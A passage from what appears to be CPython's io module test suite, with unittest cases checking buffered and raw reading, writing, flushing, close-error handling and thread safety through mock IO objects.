fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
